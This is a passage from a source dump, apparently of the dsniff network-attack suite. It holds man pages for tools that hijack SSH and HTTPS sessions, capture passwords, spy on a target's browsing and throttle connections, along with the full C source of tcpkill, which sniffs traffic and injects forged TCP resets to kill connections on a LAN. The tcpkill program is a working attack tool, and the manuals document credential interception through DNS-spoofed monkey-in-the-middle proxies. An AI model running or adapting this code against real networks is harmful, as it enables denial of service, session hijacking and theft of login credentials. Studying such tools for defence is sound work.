SSH-1 crypto routines, adapted from OpenSSH. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * Copyright (c) 2000 Niels Provos 8 | * Copyright (c) 2000 Markus Friedl 9 | * 10 | * $Id: sshcrypto.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 11 | */ 12 | 13 | #ifndef SSHCRYPTO_H 14 | #define SSHCRYPTO_H 15 | 16 | void rsa_public_encrypt(BIGNUM *src, BIGNUM *dst, RSA *key); 17 | void rsa_private_decrypt(BIGNUM *src, BIGNUM *dst, RSA *key); 18 | 19 | void *blowfish_init(u_char *sesskey, int len); 20 | void blowfish_encrypt(u_char *src, u_char *dst, int len, void *state); 21 | void blowfish_decrypt(u_char *src, u_char *dst, int len, void *state); 22 | 23 | void *des3_init(u_char *sesskey, int len); 24 | void des3_encrypt(u_char *src, u_char *dst, int len, void *state); 25 | void des3_decrypt(u_char *src, u_char *dst, int len, void *state); 26 | 27 | #endif /* SSHCRYPTO_H */ 28 | 29 | -------------------------------------------------------------------------------- /sshmitm.8: -------------------------------------------------------------------------------- 1 | .TH SSHMITM 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | sshmitm 6 | \- 7 | SSH monkey-in-the-middle 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBsshmitm\fR [\fB-d\fR] [\fB-I\fR] [\fB-p \fIport\fR] host [\fIport\fR] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBsshmitm\fR proxies and sniffs SSH traffic redirected by 17 | dnsspoof(8), capturing SSH password logins, and optionally hijacking 18 | interactive sessions. Only SSH protocol version 1 is (or ever will be) 19 | supported - this program is far too evil already. 20 | .SH OPTIONS 21 | .IP \fB-d\fR 22 | Enable verbose debugging output. 23 | .IP \fB-I\fR 24 | Monitor / hijack an interactive session. 25 | .IP "\fB-p \fIport\fR" 26 | Specify the local port to listen on. 27 | .IP \fIhost\fR 28 | Specify the remote host to relay connections to. 29 | .IP \fIport\fR 30 | Specify the remote port to relay connections to. 31 | .SH "SEE ALSO" 32 | dsniff(8), dnsspoof(8) 33 | .SH AUTHOR 34 | .na 35 | .nf 36 | Dug Song 37 | -------------------------------------------------------------------------------- /sshow.8: -------------------------------------------------------------------------------- 1 | .TH SSHOW 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | sshow 6 | \- 7 | SSH traffic analysis tool 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBsshow\fR [\fB-d\fR] [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [\fIexpression\fR] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBsshow\fR analyzes encrypted SSH-1 and SSH-2 traffic, identifying 17 | authentication attempts, the lengths of passwords entered in 18 | interactive sessions, and command line lengths. 19 | .LP 20 | The following advisory describes the attacks implemented by 21 | \fBsshow\fR in detail: 22 | .LP 23 | .RS 24 | .I http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt 25 | .RE 26 | .SH OPTIONS 27 | .IP \fB-d\fR 28 | Enable verbose debugging output. 29 | .IP "\fB-i \fIinterface\fR" 30 | Specify the interface to listen on. 31 | .IP "\fB-p \fIpcapfile\fR" 32 | Process packets from the specified PCAP capture file instead of the network. 33 | .IP "\fIexpression\fR" 34 | Specify a tcpdump(8) filter expression to select traffic to sniff. 35 | .SH "SEE ALSO" 36 | dsniff(8), sshmitm(8) 37 | .SH AUTHORS 38 | .na 39 | .nf 40 | Solar Designer 41 | Dug Song 42 | -------------------------------------------------------------------------------- /tcp_raw.h: -------------------------------------------------------------------------------- 1 | /* 2 | * tcp_raw.h 3 | * 4 | * Raw (best-effort, half-duplex) TCP reassembly. Haaacccck. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: tcp_raw.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef TCP_RAW_H 12 | #define TCP_RAW_H 13 | 14 | typedef void (*tcp_raw_callback_t)(in_addr_t src, in_addr_t dst, 15 | u_short sport, u_short dport, 16 | u_char *buf, int len); 17 | 18 | struct iovec *tcp_raw_input(struct libnet_ipv4_hdr *ip, 19 | struct libnet_tcp_hdr *tcp, int len); 20 | 21 | void tcp_raw_timeout(int timeout, tcp_raw_callback_t callback); 22 | 23 | #endif /* TCP_RAW_H */ 24 | -------------------------------------------------------------------------------- /tcpkill.8: -------------------------------------------------------------------------------- 1 | .TH TCPKILL 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | tcpkill 6 | \- 7 | kill TCP connections on a LAN 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBtcpkill\fR [\fB-i \fIinterface\fR] [\fB-1\fR...\fB9\fR] \fIexpression\fR 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBtcpkill\fR kills specified in-progress TCP connections (useful for 17 | libnids-based applications which require a full TCP 3-whs for TCB 18 | creation). 19 | .SH OPTIONS 20 | .IP "\fB-i \fIinterface\fR" 21 | Specify the interface to listen on. 22 | .IP \fB-1\fR...\fB9\fR 23 | Specify the degree of brute force to use in killing a connection. Fast 24 | connections may require a higher number in order to land a RST in the 25 | moving receive window. Default is 3. 26 | .IP \fIexpression\fR 27 | Specify a tcpdump(8) filter expression to select the connections to 28 | kill. 29 | .SH "SEE ALSO" 30 | dsniff(8), tcpnice(8) 31 | .SH AUTHOR 32 | .na 33 | .nf 34 | Dug Song 35 | -------------------------------------------------------------------------------- /tcpkill.c: -------------------------------------------------------------------------------- 1 | /* 2 | * tcpkill.c 3 | * 4 | * Kill TCP connections already in progress. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: tcpkill.c,v 1.17 2001/03/17 08:10:43 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | #include "pcaputil.h" 24 | 25 | #define DEFAULT_SEVERITY 3 26 | 27 | int Opt_severity = DEFAULT_SEVERITY; 28 | int pcap_off; 29 | 30 | static void 31 | usage(void) 32 | { 33 | fprintf(stderr, "Version: " VERSION "\n" 34 | "Usage: tcpkill [-i interface] [-1..9] expression\n"); 35 | exit(1); 36 | } 37 | 38 | static void 39 | tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) 40 | { 41 | struct libnet_ipv4_hdr *ip; 42 | struct libnet_tcp_hdr *tcp; 43 | u_char ctext[64]; 44 | u_int32_t seq, win; 45 | int i, len; 46 | libnet_t *l; 47 | 48 | l = (libnet_t *)user; 49 | pkt += pcap_off; 50 | len = pcap->caplen - pcap_off; 51 | 52 | ip = (struct libnet_ipv4_hdr *)pkt; 53 | if (ip->ip_p != IPPROTO_TCP) 54 | return; 55 | 56 | tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); 57 | if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST)) 58 | return; 59 | 60 | seq = ntohl(tcp->th_ack); 61 | win = ntohs(tcp->th_win); 62 | 63 | snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:", 64 | libnet_addr2name4(ip->ip_src.s_addr, LIBNET_DONT_RESOLVE), 65 | ntohs(tcp->th_sport), 66 | libnet_addr2name4(ip->ip_dst.s_addr, LIBNET_DONT_RESOLVE), 67 | ntohs(tcp->th_dport)); 68 | 69 | for (i = 0; i < Opt_severity; i++) { 70 | seq += (i * win); 71 | 72 | libnet_clear_packet(l); 73 | 74 | libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport), 75 | seq, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, 76 | NULL, 0, l, 0); 77 | 78 | libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0, 79 | libnet_get_prand(LIBNET_PRu16), 0, 64, 80 | IPPROTO_TCP, 0, ip->ip_dst.s_addr, 81 | ip->ip_src.s_addr, NULL, 0, l, 0); 82 | 83 | if (libnet_write(l) < 0) 84 | warn("write"); 85 | 86 | fprintf(stderr, "%s R %lu:%lu(0) win 0\n", ctext, seq, seq); 87 | } 88 | } 89 | 90 | int 91 | main(int argc, char *argv[]) 92 | { 93 | extern char *optarg; 94 | extern int optind; 95 | int c; 96 | char *p, *intf, *filter, ebuf[PCAP_ERRBUF_SIZE]; 97 | char libnet_ebuf[LIBNET_ERRBUF_SIZE]; 98 | libnet_t *l; 99 | pcap_t *pd; 100 | 101 | intf = NULL; 102 | 103 | while ((c = getopt(argc, argv, "i:123456789h?V")) != -1) { 104 | switch (c) { 105 | case 'i': 106 | intf = optarg; 107 | break; 108 | case '0': case '1': case '2': case '3': case '4': 109 | case '5': case '6': case '7': case '8': case '9': 110 | p = argv[optind - 1]; 111 | if (p[0] == '-' && p[1] == c && p[2] == '\0') 112 | Opt_severity = atoi(++p); 113 | else 114 | Opt_severity = atoi(argv[optind] + 1); 115 | break; 116 | default: 117 | usage(); 118 | break; 119 | } 120 | } 121 | if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) 122 | errx(1, "%s", ebuf); 123 | 124 | argc -= optind; 125 | argv += optind; 126 | 127 | if (argc == 0) 128 | usage(); 129 | 130 | filter = copy_argv(argv); 131 | 132 | if ((pd = pcap_init_dsniff(intf, filter, 64)) == NULL) 133 | errx(1, "couldn't initialize sniffing"); 134 | 135 | if ((pcap_off = pcap_dloff(pd)) < 0) 136 | errx(1, "couldn't determine link layer offset"); 137 | 138 | if ((l = libnet_init(LIBNET_RAW4, intf, libnet_ebuf)) == NULL) 139 | errx(1, "couldn't initialize sending"); 140 | 141 | libnet_seed_prand(l); 142 | 143 | warnx("listening on %s [%s]", intf, filter); 144 | 145 | pcap_loop(pd, -1, tcp_kill_cb, (u_char *)l); 146 | 147 | /* NOTREACHED */ 148 | 149 | exit(0); 150 | } 151 | -------------------------------------------------------------------------------- /tcpnice.8: -------------------------------------------------------------------------------- 1 | .TH TCPNICE 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | tcpnice 6 | \- 7 | slow down TCP connections on a LAN 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBtcpnice\fR [\fB-A\fR] [\fB-I\fR] [\fB-M\fR] [\fB-i \fIinterface\fR] 13 | \fIexpression\fR 14 | .SH DESCRIPTION 15 | .ad 16 | .fi 17 | \fBtcpnice\fR slows down specified TCP connections on a LAN via 18 | "active" traffic shaping. 19 | .SH OPTIONS 20 | .IP \fB-A\fR 21 | Inject TCP tiny window advertisements. 22 | .IP \fB-I\fR 23 | Inject ICMP source quench replies. 24 | .IP \fB-M\fR 25 | Inject ICMP fragmentation-needed replies with tiny next-hop MTUs. 26 | .IP "\fB-i \fIinterface\fR" 27 | Specify the interface to listen on. 28 | .IP \fIexpression\fR 29 | Specify a tcpdump(8) filter expression to select the connections to 30 | slow down. 31 | .LP 32 | If no attack type is given, all attacks will be enabled. 33 | .SH "SEE ALSO" 34 | dsniff(8), tcpkill(8) 35 | .SH AUTHOR 36 | .na 37 | .nf 38 | Dug Song 39 | -------------------------------------------------------------------------------- /trigger.h: -------------------------------------------------------------------------------- 1 | /* 2 | * trigger.h 3 | * 4 | * Trigger interface. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: trigger.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef TRIGGER_H 12 | #define TRIGGER_H 13 | 14 | #define TRIGGER_TCP_RAW_TIMEOUT 10 15 | 16 | void trigger_init_list(char *list); 17 | void trigger_init_magic(char *filename); 18 | void trigger_init_services(char *filename); 19 | 20 | void trigger_dump(void); 21 | 22 | int trigger_set_ip(int proto, char *name); 23 | int trigger_set_udp(int port, char *name); 24 | int trigger_set_tcp(int port, char *name); 25 | int trigger_set_rpc(int program, char *name); 26 | 27 | void trigger_ip(struct libnet_ipv4_hdr *ip); 28 | void trigger_udp(struct libnet_ipv4_hdr *ip); 29 | void trigger_tcp(struct tcp_stream *ts, void **conn_save); 30 | void trigger_tcp_raw(struct libnet_ipv4_hdr *ip); 31 | void trigger_tcp_raw_timeout(int signal); 32 | void trigger_rpc(int program, int proto, int port); 33 | 34 | #endif /* TRIGGER_H */ 35 | 36 | -------------------------------------------------------------------------------- /urlsnarf.8: -------------------------------------------------------------------------------- 1 | .TH URLSNARF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | urlsnarf 6 | \- 7 | sniff HTTP requests in Common Log Format 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBurlsnarf\fR [\fB-n\fR] [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBurlsnarf\fR outputs all requested URLs sniffed from HTTP traffic in 17 | CLF (Common Log Format, used by almost all web servers), suitable for 18 | offline post-processing with your favorite web log analysis tool 19 | (analog, wwwstat, etc.). 20 | .SH OPTIONS 21 | .IP \fB-n\fR 22 | Do not resolve IP addresses to hostnames. 23 | .IP "\fB-i \fIinterface\fR" 24 | Specify the interface to listen on. 25 | .IP "\fB-p \fIpcapfile\fR" 26 | Process packets from the specified PCAP capture file instead of the network. 27 | .IP \fB-v\fR 28 | "Versus" mode. Invert the sense of matching, to select non-matching 29 | URLs. 30 | Specify the interface to listen on. 31 | .IP \fIpattern\fR 32 | Specify regular expression for URL matching. 33 | .IP "\fIexpression\fR" 34 | Specify a tcpdump(8) filter expression to select traffic to sniff. 35 | .SH "SEE ALSO" 36 | dsniff(8) 37 | .SH AUTHOR 38 | .na 39 | .nf 40 | Dug Song 41 | -------------------------------------------------------------------------------- /webmitm.8: -------------------------------------------------------------------------------- 1 | .TH WEBMITM 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | webmitm 6 | \- 7 | HTTP / HTTPS monkey-in-the-middle 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBwebmitm\fR [\fB-d\fR] [\fBhost\fR] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBwebmitm\fR transparently proxies and sniffs HTTP / HTTPS traffic 17 | redirected by dnsspoof(8), capturing most "secure" SSL-encrypted 18 | webmail logins and form submissions. 19 | .SH OPTIONS 20 | .IP \fB-d\fR 21 | Enable debugging mode. May be specified multiple times to greater 22 | effect. 23 | .IP \fBhost\fR 24 | Specify a host to proxy to. If none given, only requests containing an 25 | HTTP/1.1 Host: header or absolute URI will be relayed transparently. 26 | .SH FILES 27 | .IP \fIwebmitm.crt\fR 28 | SSL certificate 29 | .SH "SEE ALSO" 30 | dsniff(8), dnsspoof(8) 31 | .SH AUTHOR 32 | .na 33 | .nf 34 | Dug Song 35 | -------------------------------------------------------------------------------- /webspy.8: -------------------------------------------------------------------------------- 1 | .TH WEBSPY 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | webspy 6 | \- 7 | display sniffed URLs in Netscape in real-time 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBwebspy\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] \fIhost\fR 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBwebspy\fR sends URLs sniffed from a client to your local Netscape 17 | browser for display, updated in real-time (as the target surfs, your 18 | browser surfs along with them, automagically). Netscape must be 19 | running on your local X display ahead of time. 20 | .SH OPTIONS 21 | .IP "\fB-i \fIinterface\fR" 22 | Specify the interface to listen on. 23 | .IP "\fB-p \fIpcapfile\fR" 24 | Process packets from the specified PCAP capture file instead of the network. 25 | .IP \fIhost\fR 26 | Specify the web client to spy on. 27 | .SH "SEE ALSO" 28 | dsniff(8) 29 | .SH AUTHOR 30 | .na 31 | .nf 32 | Dug Song 33 | --------------------------------------------------------------------------------